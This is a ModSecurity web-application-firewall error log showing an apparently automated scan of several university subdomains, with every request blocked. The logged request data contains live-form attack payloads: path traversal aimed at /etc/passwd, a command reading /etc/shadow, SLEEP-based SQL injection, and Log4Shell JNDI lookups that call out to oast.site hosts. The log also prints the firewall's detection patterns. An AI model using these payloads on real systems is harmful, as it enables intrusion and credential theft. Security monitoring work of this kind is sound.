[Tue Aug 29 11:34:16.397434 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPDoN4AAAAP"]
[Tue Aug 29 11:34:16.404528 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASI0CEAAAAG"]
[Tue Aug 29 11:34:16.404849 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAARdiP8AAAAK"]
[Tue Aug 29 11:34:16.411837 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuYAAAAA"]
[Tue Aug 29 11:34:16.411886 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuYAAAAA"]
[Tue Aug 29 11:34:17.328668 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11ScCo-f0AAASEJUcAAAAE"]
[Tue Aug 29 11:34:17.339069 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASK4f4AAAAI"]
[Tue Aug 29 11:34:17.361019 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAARdiQEAAAAK"]
[Tue Aug 29 11:34:17.376210 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASHh8AAAAAD"]
[Tue Aug 29 11:34:17.380649 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASGMukAAAAA"]
[Tue Aug 29 11:34:17.381374 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11ScCo-f0AAARdiQIAAAAK"]
[Tue Aug 29 11:34:17.403927 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11ScCo-f0AAASS7-MAAAAY"]
[Tue Aug 29 11:34:17.403967 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11ScCo-f0AAASS7-MAAAAY"]
[Tue Aug 29 11:34:17.414794 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAPLwHoAAAAX"]
[Tue Aug 29 11:34:18.312913 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11SsCo-f0AAASGMusAAAAA"]
[Tue Aug 29 11:34:18.329464 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11SsCo-f0AAASEJUwAAAAE"]
[Tue Aug 29 11:34:19.308110 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASS7-kAAAAY"]
[Tue Aug 29 11:34:19.311719 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAAPLwH4AAAAX"]
[Tue Aug 29 11:34:19.329518 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlggm7is4qxn88tr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASK4gYAAAAI"]
[Tue Aug 29 11:34:19.329655 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CYAAAAG"]
[Tue Aug 29 11:34:19.333035 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASEJVMAAAAE"]
[Tue Aug 29 11:34:19.369110 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASS7-wAAAAY"]
[Tue Aug 29 11:34:19.372824 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CgAAAAG"]
[Tue Aug 29 11:34:19.374891 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgusfz7kon1oedk.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASK4ggAAAAI"]
[Tue Aug 29 11:34:19.375010 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAPLwIAAAAAX"]
[Tue Aug 29 11:34:19.379604 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiQ8AAAAK"]
[Tue Aug 29 11:34:19.393206 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlg1g7no1qw4jwgm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASEJVYAAAAE"]
[Tue Aug 29 11:34:19.396075 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAPLwIEAAAAX"]
[Tue Aug 29 11:34:19.399647 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiRAAAAAK"]
[Tue Aug 29 11:34:19.399953 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgpftkit13cxmzy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAAShCX4AAAAi"]
[Tue Aug 29 11:34:19.442409 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlghn7r3fa3tcxwh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASGMvUAAAAA"]
[Tue Aug 29 11:34:20.311565 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11TMCo-f0AAASK4gwAAAAI"]
